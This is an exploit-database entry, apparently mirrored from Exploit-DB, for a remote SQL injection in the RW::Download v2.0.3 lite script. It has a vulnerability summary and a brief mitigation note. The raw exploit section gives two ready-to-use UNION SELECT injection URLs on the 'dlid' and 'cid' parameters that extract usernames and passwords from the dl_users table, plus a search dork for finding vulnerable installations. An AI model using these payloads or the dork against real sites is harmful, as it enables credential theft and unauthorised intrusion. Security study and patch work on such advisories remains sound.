RW::Download v2.0.3 lite - Remote SQL Injection

vendor:

RW::Download

by:

k1tk4t

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: RW::Download

Affected Version From: 2.0.3

Affected Version To: 2.0.3

Patch Exists: NO

Related CWE:

CPE: a:rwscripts:rw::download:2.0.3

Metasploit:

Other Scripts:

Platforms Tested:

2007

RW::Download v2.0.3 lite – Remote SQL Injection

The RW::Download v2.0.3 lite web application is vulnerable to remote SQL injection. An attacker can exploit this vulnerability by manipulating the 'dlid' and 'cid' parameters in the 'index.php' file. By using a UNION SELECT statement, the attacker can extract sensitive information such as usernames and passwords from the 'dl_users' table.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before executing SQL queries. Additionally, implementing prepared statements or parameterized queries can help prevent SQL injection attacks.

Source

Exploit-DB raw data:

########################################################################
# RW::Download v2.0.3 lite - Remote SQL Injection
# Vendor           : http://www.rwscripts.com/
# Ditemukan oleh   : k1tk4t - k1tk4t[4t]newhack.org
# Lokasi           : Indonesia  --  #newhack[dot]org @ irc.dal.net
# Dork             : "Powered by RW::Download v2.0.3 lite"
########################################################################

http://localhost/UPLOAD/index.php?url=&dlid=-9%20UNION%20SELECT%20null,null,null,null,username,null,null,null,null,null,null,null,null,password,null,null,null,null%20from%20dl_users/*

http://localhost/UPLOAD/index.php?url=&cid=-9%20UNION%20SELECT%20null,null,concat(username,0x3a,password),null,null,null%20from%20dl_users/*

########################################################################
Terimakasih untuk;
str0ke, DNX
xoron,iFX,x-ace,nyubi,arioo,selikoer,k1ngk0ng,aldy_BT,adhietslank
dan semua temen2 komunitas security&hacking
-----------------------
-newhack[dot]org|staff-
mR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX
-----------------------
all member newhack[dot]org
-----------------------
all member www.echo.or.id
-----------------------
all member www.yogyafree.net
-----------------------
all member www.sekuritionline.net
-----------------------
all member www.kecoak-elektronik.net
-----------------------
semua komunitas hacker&security Indonesia
Cintailah Bahasa Indonesia

# milw0rm.com [2007-09-07]